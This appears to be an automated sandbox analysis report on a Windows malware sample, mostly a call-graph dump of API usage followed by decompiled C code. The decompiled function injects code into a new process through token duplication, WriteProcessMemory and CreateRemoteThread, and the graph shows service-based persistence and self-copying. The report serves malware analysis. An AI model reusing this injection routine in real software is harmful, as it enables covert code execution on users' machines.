a11d98 3860->3861 3868 72b2471c 3871 72b2472b 3868->3871 3870 72b248c6 3872 72b24f50 3871->3872 3873 72b24f61 3872->3873 3874 72b24f76 3872->3874 3875 72b24dc6 3 API calls 3873->3875 3877 72b24f6f 3873->3877 3874->3877 3878 72b24d83 3874->3878 3875->3877 3877->3870 3879 72b24d8f 3878->3879 3885 72b24da6 3878->3885 3881 72b24d44 GetVersion 3879->3881 3880 72b234a6 2 API calls 3882 72b24db2 3880->3882 3883 72b24d9b 3881->3883 3882->3877 3886 72b21b20 LocalAlloc 3883->3886 3885->3880 3887 72b21b39 3886->3887 3887->3885 3888 72b2351d 3889 72b23537 3888->3889 3890 72b235f4 KillTimer 3888->3890 3892 72b23543 3889->3892 3894 72b2354f 3889->3894 3891 72b23602 PeekMessageA 3890->3891 3891->3891 3893 72b23615 PostQuitMessage 3891->3893 3898 72b2354a 3892->3898 3915 72b22ea1 3892->3915 3895 72b23622 DefWindowProcA 3893->3895 3900 72b235c0 3893->3900 3894->3895 3896 72b23559 KillTimer 3894->3896 3895->3900 3899 72b23567 PeekMessageA 3896->3899 3898->3895 3899->3899 3902 72b2357a 3899->3902 3909 72b2327b 3902->3909 3904 72b235db 3904->3890 3907 72b235e3 SetTimer 3904->3907 3905 72b235cd SetEvent 3905->3904 3906 72b2357f 3906->3895 3908 72b2358d SetTimer 3906->3908 3907->3900 3908->3895 3910 72b232af 3909->3910 3911 72b2328a 3909->3911 3913 72b22ea1 33 API calls 3910->3913 3912 72b232a3 3911->3912 3924 72b22adb 3911->3924 3912->3906 3913->3912 3916 72b22eb0 PostThreadMessageA WaitForSingleObject CloseHandle 3915->3916 3918 72b22eef 3915->3918 3916->3918 3917 72b22f05 3917->3900 3917->3904 3917->3905 3918->3917 4000 72b237be 3918->4000 3920 72b22f71 CreateThread 3920->3917 4005 72b23132 3920->4005 3922 72b237be 2 API calls 3923 72b22f63 3922->3923 3923->3920 3958 72b24a94 3924->3958 3926 72b22aea GetCurrentProcessId OpenProcess 3929 72b22b24 3926->3929 3957 72b22cf2 3926->3957 3928 72b22cfe 3928->3912 3930 72b22b64 3929->3930 3959 72b22598 3929->3959 3933 72b22b75 3930->3933 3968 72b22842 GetModuleFileNameA 3930->3968 3934 72b22bf6 CreateProcessA 3933->3934 3935 72b22b7a DuplicateTokenEx 3933->3935 3938 72b22c19 3934->3938 3936 72b22bb0 CreateEnvironmentBlock CreateProcessAsUserA 3935->3936 3937 72b22b9c SetTokenInformation 3935->3937 3936->3938 3939 72b22beb CloseHandle 3936->3939 3937->3936 3940 72b22c97 3938->3940 3943 72b22842 10 API calls 3938->3943 3955 72b22c40 3938->3955 3939->3938 3941 72b22caf 3940->3941 3942 72b22c9c TerminateProcess CloseHandle 3940->3942 3947 72b22cb4 CloseHandle 3941->3947 3941->3957 3942->3941 3948 72b22c30 3943->3948 3944 72b22c58 WriteProcessMemory 3945 72b22c7b 3944->3945 3946 72b22cbf ResumeThread 3944->3946 3982 72b224bc CreateRemoteThread 3945->3982 3950 72b22cc8 3946->3950 3947->3957 3976 72b227d2 VirtualAllocEx 3948->3976 3953 72b22cd0 CreateThread 3950->3953 3954 72b22cea 3950->3954 3953->3957 3990 72b22758 SetStdHandle WaitForSingleObject CloseHandle 3954->3990 3955->3944 3955->3957 3992 72b22d0b 3957->3992 3958->3926 3960 72b225a9 GetSystemDirectoryA lstrcatA 3959->3960 3963 72b225cb 3959->3963 3967 72b2264b 3960->3967 3961 72b225cf lstrcpyA 3962 72b225e3 RegOpenKeyA 3961->3962 3961->3963 3962->3963 3964 72b225f7 RegQueryValueExA RegCloseKey 3962->3964 3963->3961 3963->3962 3963->3967 3965 72b2262b GetBinaryTypeA 3964->3965 3966 72b2261f lstrcatA 3964->3966 3965->3963 3966->3965 3967->3930 3969 72b2293e 3968->3969 3970 72b2286b lstrcpyA lstrlenA lstrcmpiA 3968->3970 3969->3933 3970->3969 3972 72b228b2 lstrcpyA CopyFileA 3970->3972 3972->3969 3973 72b228cd CreateFileA 3972->3973 3973->3969 3974 72b228e7 SetFilePointer WriteFile CloseHandle 3973->3974 3974->3969 3977 72b22838 3976->3977 3978 72b227f8 lstrlenA WriteProcessMemory 3976->3978 3977->3955 3979 72b22814 3978->3979 3980 72b2282a VirtualFreeEx 3978->3980 3981 72b224bc 5 API calls 3979->3981 3980->3977 3981->3980 3983 72b2252b TerminateProcess 3982->3983 3987 72b224ee 3982->3987 3984 72b22535 3983->3984 3984->3940 3984->3950 3985 72b224f3 3986 72b22520 CloseHandle 3985->3986 3986->3984 3987->3985 3988 72b2250c WaitForMultipleObjects 3987->3988 3988->3986 3989 72b22516 GetExitCodeThread 3988->3989 3989->3986 3991 72b22783 3990->3991 3991->3957 3994 72b22d10 3992->3994 3993 72b22d23 3996 72b22d31 3993->3996 3997 72b22d28 CloseHandle 3993->3997 3994->3993 3995 72b22d1d CloseHandle 3994->3995 3995->3993 3998 72b22d36 CloseHandle 3996->3998 3999 72b22d3f 3996->3999 3997->3996 3998->3999 3999->3928 4001 72b237d4 4000->4001 4002 72b22f26 4001->4002 4003 72b237e5 inet_addr 4001->4003 4004 72b237eb inet_ntoa 4001->4004 4002->3917 4002->3920 4002->3922 4003->4004 4004->4002 4006 72b2313e 4005->4006 4009 72b22ff9 4006->4009 4008 72b2314c 4012 72b2301a 4009->4012 4010 72b23081 LocalAlloc 4011 72b23094 GetCurrentThreadId 4010->4011 4010->4012 4011->4012 4012->4010 4016 72b230bc CreateThread 4012->4016 4019 72b23065 PeekMessageA 4012->4019 4020 72b2307c 4012->4020 4021 72b22d7f LoadLibraryA 4012->4021 4030 72b21f30 4012->4030 4016->4012 4018 72b230e0 SetThreadPriority 4016->4018 4018->4012 4019->4012 4019->4020 4041 72b22d40 4020->4041 4022 72b22db4 4021->4022 4023 72b22dac 4021->4023 4024 72b22dbd GetProcAddress 4022->4024 4026 72b22de1 4022->4026 4023->4012 4024->4022 4025 72b22dfd FreeLibrary 4024->4025 4025->4023 4026->4023 4027 72b22e10 inet_ntoa 4026->4027 4028 72b22df8 4026->4028 4027->4028 4028->4023 4029 72b22e6d wsprintfA 4028->4029 4029->4023 4031 72b21f90 4030->4031 4032 72b21f3b 4030->4032 4031->4012 4033 72b21f4c 4032->4033 4045 72b21de6 4032->4045 4050 72b21e58 4033->4050 4037 72b21f89 LocalFree 4037->4031 4038 72b21f5c WaitForSingleObject 4039 72b21f6f TerminateThread 4038->4039 4040 72b21f7d CloseHandle 4038->4040 4039->4040 4040->4037 4042 72b22d7a PostMessageA 4041->4042 4043 72b22d4d FreeLibrary 4041->4043 4042->4008 4043->4042 4047 72b21dfb 4045->4047 4048 72b21e4b 4045->4048 4046 72b21e05 GetMessageA 4046->4047 4047->4046 4047->4048 4049 72b21e2f TranslateMessage DispatchMessageA 4047->4049 4048->4033 4049->4046 4049->4048 4051 72b22d40 FreeLibrary 4050->4051 4052 72b21e72 4051->4052 4053 72b216ba 8 API calls 4052->4053 4054 72b21e7e 4053->4054 4055 72b216ba 8 API calls 4054->4055 4056 72b21e87 4055->4056 4056->4037 4056->4038 4057 a15313 4058 a15320 4057->4058 4060 a1534f 4058->4060 4062 a15126 4058->4062 4068 a1501f 4058->4068 4067 a15136 4062->4067 4064 a15259 4064->4058 4066 a1501f 11 API calls 4066->4067 4067->4064 4067->4066 4078 a119ca 4067->4078 4087 a11ab5 4067->4087 4069 a15036 4068->4069 4104 a11a44 4069->4104 4071 a150e0 4072 a11a44 11 API calls 4071->4072 4073 a150e8 4072->4073 4109 a11b9e 4073->4109 4075 a11a44 11 API calls 4077 a15042 4075->4077 4076 a150ee 4076->4058 4077->4071 4077->4075 4092 a11a9d 4078->4092 4081 a11a9d RaiseException 4082 a11a00 4081->4082 4083 a11a17 4082->4083 4084 a11a06 WaitForSingleObject 4082->4084 4096 a115cc 4083->4096 4084->4083 4086 a11a23 4086->4067 4088 a11a7e 2 API calls 4087->4088 4089 a11ac2 ResetEvent 4088->4089 4090 a115ad 2 API calls 4089->4090 4091 a11ade 4090->4091 4091->4067 4093 a119db 4092->4093 4094 a11aa9 4092->4094 4093->4081 4093->4086 4103 a1210c RaiseException 4094->4103 4097 a11a7e 2 API calls 4096->4097 4098 a115da 4097->4098 4099 a11620 4098->4099 4102 a1160d ResetEvent 4098->4102 4100 a115ad 2 API calls 4099->4100 4101 a11627 4100->4101 4101->4086 4102->4098 4103->4093 4105 a11a9d RaiseException 4104->4105 4106 a11a51 4105->4106 4107 a11a79 4106->4107 4108 a11b9e 11 API calls 4106->4108 4107->4077 4108->4107 4112 a11bbc 4109->4112 4110 a11bf8 4110->4076 4111 a11a9d RaiseException 4111->4112 4112->4110 4112->4111 4113 a1162f 9 API calls 4112->4113 4114 a11bdb Sleep WaitForSingleObject 4112->4114 4113->4112 4114->4112 4117 a12314 4133 a14a94 4117->4133 4119 a12323 GetStdHandle ReadProcessMemory 4120 a12354 ReadProcessMemory 4119->4120 4121 a1241b ExitThread 4119->4121 4120->4121 4122 a1236d 4120->4122 4123 a123a7 4122->4123 4125 a1237c 4122->4125 4124 a123ad ReadProcessMemory 4123->4124 4132 a123a2 4123->4132 4124->4121 4126 a123c5 4124->4126 4127 a12394 SetEvent 4125->4127 4128 a1239c ResetEvent 4125->4128 4125->4132 4129 a123ee 4126->4129 4131 a115cc 4 API calls 4126->4131 4127->4132 4128->4132 4130 a1162f 9 API calls 4129->4130 4130->4132 4131->4129 4132->4121 4133->4119 4134 72b24e04 4135 72b24eaf 4134->4135 4142 72b24e29 4134->4142 4136 72b24e71 GetProcAddress 4136->4142 4137 72b24e67 GetModuleHandleA 4137->4142 4139 72b21b20 LocalAlloc 4139->4142 4142->4135 4142->4136 4142->4137 4142->4139 4143 72b24ef1 GetVersion 4142->4143 4145 72b21b01 4142->4145 4148 72b2175e RaiseException 4142->4148 4144 72b24f08 4143->4144 4144->4142 4149 72b21c40 4145->4149 4148->4142 4150 72b21b14 LocalFree 4149->4150 4150->4142 4158 a11d17 4159 a11d1a ExitThread 4158->4159 3250 a1351d 3251 a135f4 KillTimer 3250->3251 3252 a13537 3250->3252 3254 a13602 PeekMessageA 3251->3254 3253 a135a1 3252->3253 3255 a13543 3252->3255 3256 a1354f 3252->3256 3278 a12ea1 3253->3278 3254->3254 3257 a13615 PostQuitMessage 3254->3257 3255->3253 3258 a1354a 3255->3258 3259 a13622 DefWindowProcA 3256->3259 3260 a13559 KillTimer 3256->3260 3257->3259 3261 a135c0 3257->3261 3258->3259 3259->3261 3263 a13567 PeekMessageA 3260->3263 3263->3263 3265 a1357a 3263->3265 3272 a1327b 3265->3272 3266 a135db 3266->3251 3269 a135e3 SetTimer 3266->3269 3267 a135cd SetEvent 3267->3266 3269->3261 3270 a1357f 3270->3259 3271 a1358d SetTimer 3270->3271 3271->3259 3273 a1328a 3272->3273 3274 a132af 3272->3274 3275 a132a3 3273->3275 3287 a12adb 3273->3287 3276 a12ea1 33 API calls 3274->3276 3275->3270 3276->3275 3279 a12eb0 PostThreadMessageA WaitForSingleObject CloseHandle 3278->3279 3280 a12eef 3278->3280 3279->3280 3281 a12f05 3280->3281 3366 a137be 3280->3366 3281->3261 3281->3266 3281->3267 3283 a12f71 CreateThread 3283->3281 3371 a13132 3283->3371 3285 a137be 2 API calls 3286 a12f63 3285->3286 3286->3283 3323 a14a94 3287->3323 3289 a12aea GetCurrentProcessId OpenProcess 3290 a12b24 3289->3290 3322 a12cf2 3289->3322 3293 a12b53 3290->3293 3294 a12b68 3290->3294 3292 a12cfe 3292->3275 3348 a12598 3293->3348 3296 a12842 10 API calls 3294->3296 3298 a12b75 3296->3298 3299 a12bf6 CreateProcessA 3298->3299 3300 a12b7a DuplicateTokenEx 3298->3300 3303 a12c19 3299->3303 3301 a12bb0 CreateEnvironmentBlock CreateProcessAsUserA 3300->3301 3302 a12b9c SetTokenInformation 3300->3302 3301->3303 3304 a12beb CloseHandle 3301->3304 3302->3301 3305 a12c40 3303->3305 3306 a12c97 3303->3306 3324 a12842 GetModuleFileNameA 3303->3324 3304->3303 3310 a12c58 WriteProcessMemory 3305->3310 3305->3322 3307 a12c9c TerminateProcess CloseHandle 3306->3307 3308 a12caf 3306->3308 3307->3308 3313 a12cb4 CloseHandle 3308->3313 3308->3322 3311 a12c7b 3310->3311 3312 a12cbf ResumeThread 3310->3312 3338 a124bc CreateRemoteThread 3311->3338 3316 a12cc8 3312->3316 3313->3322 3319 a12cd0 CreateThread 3316->3319 3320 a12cea 3316->3320 3319->3322 3365 a12758 3 API calls 3319->3365 3346 a12758 SetStdHandle WaitForSingleObject CloseHandle 3320->3346 3357 a12d0b 3322->3357 3323->3289 3325 a1293e 3324->3325 3326 a1286b lstrcpyA lstrlenA lstrcmpiA 3324->3326 3332 a127d2 VirtualAllocEx 3325->3332 3326->3325 3328 a128b2 lstrcpyA CopyFileA 3326->3328 3328->3325 3329 a128cd CreateFileA 3328->3329 3329->3325 3330 a128e7 SetFilePointer WriteFile CloseHandle 3329->3330 3330->3325 3333 a12838 3332->3333 3334 a127f8 lstrlenA WriteProcessMemory 3332->3334 3333->3305 3335 a12814 3334->3335 3336 a1282a VirtualFreeEx 3334->3336 3337 a124bc 5 API calls 3335->3337 3336->3333 3337->3336 3339 a1252b TerminateProcess 3338->3339 3343 a124ee 3338->3343 3340 a12535 3339->3340 3340->3306 3340->3316 3341 a124f3 3342 a12520 CloseHandle 3341->3342 3342->3340 3343->3341 3344 a1250c WaitForMultipleObjects 3343->3344 3344->3342 3345 a12516 GetExitCodeThread 3344->3345 3345->3342 3347 a12783 3346->3347 3347->3322 3349 a125a9 GetSystemDirectoryA lstrcatA 3348->3349 3356 a125cb 3348->3356 3355 a1264b 3349->3355 3350 a125cf lstrcpyA 3351 a125e3 RegOpenKeyA 3350->3351 3350->3356 3352 a125f7 RegQueryValueExA RegCloseKey 3351->3352 3351->3356 3353 a1262b GetBinaryTypeA 3352->3353 3354 a1261f lstrcatA 3352->3354 3353->3356 3354->3353 3355->3294 3355->3298 3356->3350 3356->3351 3356->3355 3358 a12d10 3357->3358 3359 a12d23 3358->3359 3360 a12d1d CloseHandle 3358->3360 3361 a12d31 3359->3361 3362 a12d28 CloseHandle 3359->3362 3360->3359 3363 a12d36 CloseHandle 3361->3363 3364 a12d3f 3361->3364 3362->3361 3363->3364 3364->3292 3367 a137d4 3366->3367 3368 a12f26 3367->3368 3369 a137e5 inet_addr 3367->3369 3370 a137eb inet_ntoa 3367->3370 3368->3281 3368->3283 3368->3285 3369->3370 3370->3368 3372 a1313e 3371->3372 3375 a12ff9 3372->3375 3374 a1314c 3379 a1301a 3375->3379 3376 a13081 LocalAlloc 3378 a13094 GetCurrentThreadId 3376->3378 3376->3379 3377 a1307c 3407 a12d40 3377->3407 3378->3379 3379->3376 3379->3377 3384 a130bc CreateThread 3379->3384 3386 a13065 PeekMessageA 3379->3386 3387 a12d7f LoadLibraryA 3379->3387 3396 a11f30 3379->3396 3384->3379 3385 a130e0 SetThreadPriority 3384->3385 3385->3379 3386->3377 3386->3379 3388 a12db4 3387->3388 3389 a12dac 3387->3389 3390 a12dbd GetProcAddress 3388->3390 3392 a12de1 3388->3392 3389->3379 3390->3388 3391 a12dfd FreeLibrary 3390->3391 3391->3389 3392->3389 3393 a12e10 inet_ntoa 3392->3393 3394 a12df8 3392->3394 3393->3394 3394->3389 3395 a12e6d wsprintfA 3394->3395 3395->3389 3397 a11f90 3396->3397 3398 a11f3b 3396->3398 3397->3379 3399 a11f4c 3398->3399 3411 a11de6 3398->3411 3416 a11e58 3399->3416 3403 a11f89 LocalFree 3403->3397 3404 a11f5c WaitForSingleObject 3405 a11f7d CloseHandle 3404->3405 3406 a11f6f TerminateThread 3404->3406 3405->3403 3406->3405 3408 a12d7a PostMessageA 3407->3408 3409 a12d4d FreeLibrary 3407->3409 3408->3374 3409->3408 3413 a11dfb 3411->3413 3414 a11e4b 3411->3414 3412 a11e05 GetMessageA 3412->3413 3413->3412 3413->3414 3415 a11e2f TranslateMessage DispatchMessageA 3413->3415 3414->3399 3415->3412 3415->3414 3417 a12d40 FreeLibrary 3416->3417 3418 a11e72 3417->3418 3423 a116ba 3418->3423 3421 a116ba 8 API calls 3422 a11e87 3421->3422 3422->3403 3422->3404 3424 a11759 3423->3424 3425 a116cf EnterCriticalSection 3423->3425 3424->3421 3426 a116f9 SetEvent 3425->3426 3427 a116fc 3425->3427 3426->3427 3428 a11706 SetEvent 3427->3428 3429 a11709 3427->3429 3428->3429 3430 a11734 3429->3430 3431 a11719 WaitForSingleObject CloseHandle 3429->3431 3432 a11741 3430->3432 3433 a1173e CloseHandle 3430->3433 3431->3430 3434 a1174b CloseHandle 3432->3434 3435 a1174e DeleteCriticalSection 3432->3435 3433->3432 3434->3435 3435->3424 4164 a1221c 4165 a1221f 4164->4165 4166 a12232 4165->4166 4167 a12229 FreeLibrary 4165->4167 4168 a12241 4166->4168 4169 a12238 LocalFree 4166->4169 4167->4166 4169->4168 4170 a1471c 4173 a1472b 4170->4173 4172 a148c6 4174 a14f50 4173->4174 4175 a14f61 4174->4175 4176 a14f76 4174->4176 4177 a14dc6 3 API calls 4175->4177 4179 a14f6f 4175->4179 4176->4179 4180 a14d83 4176->4180 4177->4179 4179->4172 4181 a14da6 4180->4181 4182 a14d8f 4180->4182 4184 a134a6 2 API calls 4181->4184 4183 a14d44 GetVersion 4182->4183 4185 a14d9b 4183->4185 4186 a14db2 4184->4186 4187 a11b20 LocalAlloc 4185->4187 4186->4179 4187->4181 4226 a11eeb 4227 a11f12 4226->4227 4228 a11ef4 4226->4228 4235 a12266 SetServiceStatus 4227->4235 4228->4227 4229 a11ef9 4228->4229 4234 a12266 SetServiceStatus 4229->4234 4232 a11f20 SetEvent 4233 a11f10 4232->4233 4234->4233 4235->4232 4236 a13675 4237 a13684 GetModuleHandleA 4236->4237 4238 a136ac 4236->4238 4237->4238 4239 a13690 4237->4239 4239->4238 4240 a13694 GetProcAddress 4239->4240 4240->4238 4241 a120f4 4242 a120f7 4241->4242 4243 a14dc6 3 API calls 4242->4243 4244 a12104 4243->4244 4245 a14474 4246 a14483 4245->4246 4247 a1449c 4246->4247 4249 a1493c 4246->4249 4250 a1494c 4249->4250 4250->4250 4251 a14955 LoadLibraryA 4250->4251 4252 a149de 4251->4252 4253 a1496e GetProcAddress GetProcAddress GetProcAddress 4251->4253 4252->4247 4255 a149a4 FreeLibrary 4253->4255 4255->4252 4256 a15277 4259 a15288 4256->4259 4257 a15303 4258 a1501f 11 API calls 4258->4259 4259->4257 4259->4258 4260 a15126 14 API calls 4259->4260 4260->4259 4261 72b21eeb 4262 72b21f12 4261->4262 4263 72b21ef4 4261->4263 4270 72b22266 SetServiceStatus 4262->4270 4263->4262 4264 72b21ef9 4263->4264 4269 72b22266 SetServiceStatus 4264->4269 4267 72b21f20 SetEvent 4268 72b21f10 4267->4268 4269->4268 4270->4267 4271 a11c7b 4280 a14a94 4271->4280 4273 a11c87 LocalAlloc GetStdHandle 4274 a11cab WriteProcessMemory 4273->4274 4275 a11d1a ExitThread 4273->4275 4276 a11d08 LocalFree 4274->4276 4277 a11ccc ReadProcessMemory 4274->4277 4276->4275 4277->4276 4278 a11ce1 4277->4278 4279 a11f95 34 API calls 4278->4279 4279->4276 4280->4273 4284 72b22658 CreateEventA RegisterServiceCtrlHandlerA 4285 72b226aa 4284->4285 4298 72b22751 4284->4298 4299 72b22266 SetServiceStatus 4285->4299 4287 72b226c0 4300 72b22266 SetServiceStatus 4287->4300 4289 72b226d3 4301 72b22296 RegOpenKeyA 4289->4301 4292 72b22706 WaitForSingleObject 4295 72b2272a WaitForSingleObject CloseHandle 4292->4295 4296 72b2271f PostMessageA 4292->4296 4293 72b226fe 4294 72b2273d CloseHandle 4293->4294 4307 72b22266 SetServiceStatus 4294->4307 4295->4294 4296->4295 4299->4287 4300->4289 4302 72b22312 CreateThread 4301->4302 4303 72b222bb RegQueryValueExA 4301->4303 4302->4292 4302->4293 4308 72b23161 4302->4308 4304 72b222ed RegEnumValueA 4303->4304 4305 72b222e0 RegDeleteValueA 4304->4305 4306 72b22306 RegCloseKey 4304->4306 4305->4304 4306->4302 4307->4298 4314 72b24a94 4308->4314 4310 72b23170 GetModuleFileNameA RegisterClassA CreateWindowExA SetTimer 4311 72b231df GetMessageA 4310->4311 4312 72b231f0 TranslateMessage DispatchMessageA 4311->4312 4313 72b23206 4311->4313 4312->4311 4314->4310 4315 a1224a PostThreadMessageA 4316 72b232de GetVersion 4317 72b23307 GetStdHandle 4316->4317 4318 72b232fc 4316->4318 4340 72b23420 4317->4340 4318->4317 4321 72b233a3 4324 72b233b1 CreateEventA 4321->4324 4331 72b233c0 CreateThread 4321->4331 4334 72b23369 4321->4334 4322 72b23376 SetStdHandle 4339 72b23365 4322->4339 4323 72b23334 4347 72b22123 4323->4347 4324->4331 4325 72b2339c 4363 72b21eda StartServiceCtrlDispatcherA 4325->4363 4327 72b23413 CloseHandle 4328 72b23418 ExitProcess 4327->4328 4330 72b23343 4332 72b22adb 47 API calls 4330->4332 4333 72b233da 4331->4333 4331->4334 4365 72b23161 7 API calls 4331->4365 4335 72b23357 4332->4335 4336 72b233e9 WaitForSingleObject CloseHandle 4333->4336 4337 72b233fc WaitForSingleObject CloseHandle 4333->4337 4334->4327 4334->4328 4338 72b23362 CloseHandle 4335->4338 4335->4339 4336->4337 4337->4334 4338->4339 4339->4321 4339->4324 4339->4325 4339->4334 4341 72b2343a 4340->4341 4342 72b23459 4340->4342 4345 72b22842 10 API calls 4341->4345 4343 72b23480 GetCurrentProcessId 4342->4343 4344 72b23318 4342->4344 4343->4344 4344->4322 4344->4323 4344->4339 4346 72b23448 LoadLibraryA 4345->4346 4346->4342 4364 72b24a94 4347->4364 4349 72b2212f LoadLibraryA 4350 72b22154 GetProcAddress 4349->4350 4359 72b2221f 4349->4359 4351 72b2216d GetProcAddress 4350->4351 4350->4359 4357 72b22180 4351->4357 4351->4359 4352 72b22232 4354 72b22241 4352->4354 4355 72b22238 LocalFree 4352->4355 4353 72b22229 FreeLibrary 4353->4352 4354->4330 4355->4354 4356 72b22185 LocalAlloc 4356->4357 4356->4359 4357->4356 4358 72b221a8 LocalFree 4357->4358 4357->4359 4360 72b221c1 4357->4360 4358->4357 4359->4352 4359->4353 4360->4359 4361 72b221df OpenProcess 4360->4361 4361->4359 4362 72b221f4 OpenProcessToken CloseHandle 4361->4362 4362->4359 4363->4334 4364->4349 4369 a14acf 4371 a14b0d 4369->4371 4370 a14bcc 4371->4370 4372 a14b9c RtlUnwind 4371->4372 4372->4371 3218 a12658 CreateEventA RegisterServiceCtrlHandlerA 3219 a12752 3218->3219 3220 a126aa 3218->3220 3234 a12266 SetServiceStatus 3220->3234 3222 a126c0 3235 a12266 SetServiceStatus 3222->3235 3224 a126d3 3236 a12296 RegOpenKeyA 3224->3236 3227 a12706 WaitForSingleObject 3230 a1272a WaitForSingleObject CloseHandle 3227->3230 3231 a1271f PostMessageA 3227->3231 3228 a126fe 3229 a1273d CloseHandle 3228->3229 3242 a12266 SetServiceStatus 3229->3242 3230->3229 3231->3230 3233 a12751 3233->3219 3234->3222 3235->3224 3237 a12312 CreateThread 3236->3237 3238 a122bb RegQueryValueExA 3236->3238 3237->3227 3237->3228 3243 a13161 3237->3243 3239 a122ed RegEnumValueA 3238->3239 3240 a122e0 RegDeleteValueA 3239->3240 3241 a12306 RegCloseKey 3239->3241 3240->3239 3241->3237 3242->3233 3249 a14a94 3243->3249 3245 a13170 GetModuleFileNameA RegisterClassA CreateWindowExA SetTimer 3246 a131df GetMessageA 3245->3246 3247 a131f0 TranslateMessage DispatchMessageA 3246->3247 3248 a13206 3246->3248 3247->3246 3249->3245 3436 a132de GetVersion 3437 a13307 GetStdHandle 3436->3437 3438 a132fc 3436->3438 3462 a13420 3437->3462 3438->3437 3441 a1338f 3442 a133a3 3441->3442 3445 a133b1 CreateEventA 3441->3445 3446 a1339c 3441->3446 3442->3445 3448 a13369 3442->3448 3449 a133ac 3442->3449 3443 a13334 3470 a12123 3443->3470 3444 a13376 SetStdHandle 3444->3441 3450 a133c0 CreateThread 3445->3450 3469 a11eda StartServiceCtrlDispatcherA 3446->3469 3451 a13413 CloseHandle 3448->3451 3452 a13418 ExitProcess 3448->3452 3449->3445 3449->3450 3450->3448 3456 a133da 3450->3456 3451->3452 3454 a13343 3455 a12adb 47 API calls 3454->3455 3457 a13357 3455->3457 3458 a133e9 WaitForSingleObject CloseHandle 3456->3458 3459 a133fc WaitForSingleObject CloseHandle 3456->3459 3460 a13362 CloseHandle 3457->3460 3461 a13365 3457->3461 3458->3459 3459->3448 3460->3461 3461->3441 3461->3448 3463 a13459 3462->3463 3464 a1343a 3462->3464 3465 a13480 GetCurrentProcessId 3463->3465 3466 a13318 3463->3466 3467 a12842 10 API calls 3464->3467 3465->3466 3466->3441 3466->3443 3466->3444 3468 a13448 LoadLibraryA 3467->3468 3468->3463 3469->3448 3486 a14a94 3470->3486 3472 a1212f LoadLibraryA 3473 a1221f 3472->3473 3474 a12154 GetProcAddress 3472->3474 3475 a12232 3473->3475 3476 a12229 FreeLibrary 3473->3476 3474->3473 3477 a1216d GetProcAddress 3474->3477 3478 a12241 3475->3478 3479 a12238 LocalFree 3475->3479 3476->3475 3477->3473 3481 a12180 3477->3481 3478->3454 3479->3478 3480 a12185 LocalAlloc 3480->3473 3480->3481 3481->3473 3481->3480 3482 a121a8 LocalFree 3481->3482 3483 a121c1 3481->3483 3482->3481 3483->3473 3484 a121df OpenProcess 3483->3484 3484->3473 3485 a121f4 OpenProcessToken CloseHandle 3484->3485 3485->3473 3486->3472

Executed Functions

Control-flow Graph

C-Code - Quality: 91%
			E00A12ADB(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t70;
				int _t83;
				int _t84;
				void* _t91;
				int _t101;
				void* _t117;
				struct _STARTUPINFOA _t120;
				void** _t121;
				void* _t124;

				_t117 = __ecx;
				_push(0x180);
				_push(0xa15410);
				E00A14A94(__ebx, __edi, __esi);
				 *(_t124 - 0x1c) = 0;
				 *(_t124 - 0x3c) = 0;
				 *((intOrPtr*)(_t124 - 0x24)) =  *((intOrPtr*)( *0xa16008 + 0x34));
				 *(_t124 - 0x40) = 0;
				 *(_t124 - 4) = 0;
				_t70 = OpenProcess(0x1fffff, 1, GetCurrentProcessId());
				 *(_t124 - 0x38) = _t70;
				if(_t70 == 0) {
					L26:
					 *(_t124 - 4) =  *(_t124 - 4) | 0xffffffff;
					E00A12D0B(0);
					return E00A1159C( *(_t124 - 0x1c));
				} else {
					_t120 = 0x44;
					E00A14D2D(_t124 - 0x8c, 0, _t120);
					 *(_t124 - 0x8c) = _t120;
					 *((short*)(_t124 - 0x5c)) = 0;
					 *((intOrPtr*)(_t124 - 0x60)) = 0x181;
					 *(_t124 - 0x4c) =  *(_t124 - 0x38);
					if( *((intOrPtr*)(_t124 - 0x24)) == 0 || E00A12598(_t124 - 0x190, 0x104) == 0) {
						E00A12842(_t124 - 0x190, 1);
					}
					if( *(_t124 + 8) == 0) {
						_t83 = CreateProcessA(0, _t124 - 0x190, 0, 0, 1, 4, 0, 0, _t124 - 0x8c, _t124 - 0x34); // executed
						 *(_t124 - 0x1c) = _t83;
					} else {
						_t121 = _t124 + 8;
						 *(_t124 - 0x20) = 0;
						 *(_t124 - 0x44) = 0;
						if(DuplicateTokenEx( *(_t124 + 8), 0x2000000, 0, 0, 1, _t124 - 0x20) != 0) {
							SetTokenInformation( *(_t124 - 0x20), 0xc, _t124 - 0x44, 4);
							_t121 = _t124 - 0x20;
						}
						_push(0);
						_push( *_t121);
						_push(_t124 - 0x40);
						L00A1446E();
						 *(_t124 - 0x1c) = CreateProcessAsUserA( *_t121, 0, _t124 - 0x190, 0, 0, 1, 0x404,  *(_t124 - 0x40), 0, _t124 - 0x8c, _t124 - 0x34);
						if( *(_t124 - 0x20) != 0) {
							CloseHandle( *(_t124 - 0x20));
						}
					}
					if( *((intOrPtr*)(_t124 - 0x24)) == 0) {
						L13:
						_t84 =  *(_t124 - 0x1c);
						if(_t84 == 0) {
							goto L26;
						}
						if( *((intOrPtr*)(_t124 - 0x24)) == 0) {
							_t84 =  *0xa160c4;
						}
						WriteProcessMemory( *(_t124 - 0x34), _t84 -  *0xa160c4 + 0xa160c8, 0xa160c8, 0x80, 0); // executed
						if( *((intOrPtr*)(_t124 - 0x24)) == 0) {
							ResumeThread( *(_t124 - 0x30));
							goto L23;
						} else {
							E00A124BC(0xa160c8,  *(_t124 - 0x34),  *((intOrPtr*)( *0xa16008 + 0x34)), 0, 0, _t124 - 0x1c, 0); // executed
							if( *(_t124 - 0x1c) != 0) {
								L23:
								if( *0xa16038 != 0) {
									E00A12758( *(_t124 - 0x34));
									 *(_t124 - 0x34) = 0;
								} else {
									_t91 = CreateThread(0, 0, E00A12758,  *(_t124 - 0x34), 0, _t124 - 0x48); // executed
									 *(_t124 - 0x3c) = _t91;
								}
								goto L26;
							}
							goto L18;
						}
					} else {
						if( *(_t124 - 0x1c) == 0) {
							L18:
							if( *(_t124 - 0x34) != 0) {
								TerminateProcess( *(_t124 - 0x34), 0);
								CloseHandle( *(_t124 - 0x34));
							}
							if( *(_t124 - 0x30) != 0) {
								CloseHandle( *(_t124 - 0x30));
							}
							goto L26;
						}
						E00A12842(_t124 - 0x190, 0); // executed
						_t101 = E00A127D2(_t117, _t124 - 0x190,  *(_t124 - 0x34), 0); // executed
						 *(_t124 - 0x1c) = _t101;
						goto L13;
					}
				}
			}












0x00a12adb
0x00a12adb
0x00a12ae0
0x00a12ae5
0x00a12aec
0x00a12aef
0x00a12afa
0x00a12afd
0x00a12b00
0x00a12b13
0x00a12b19
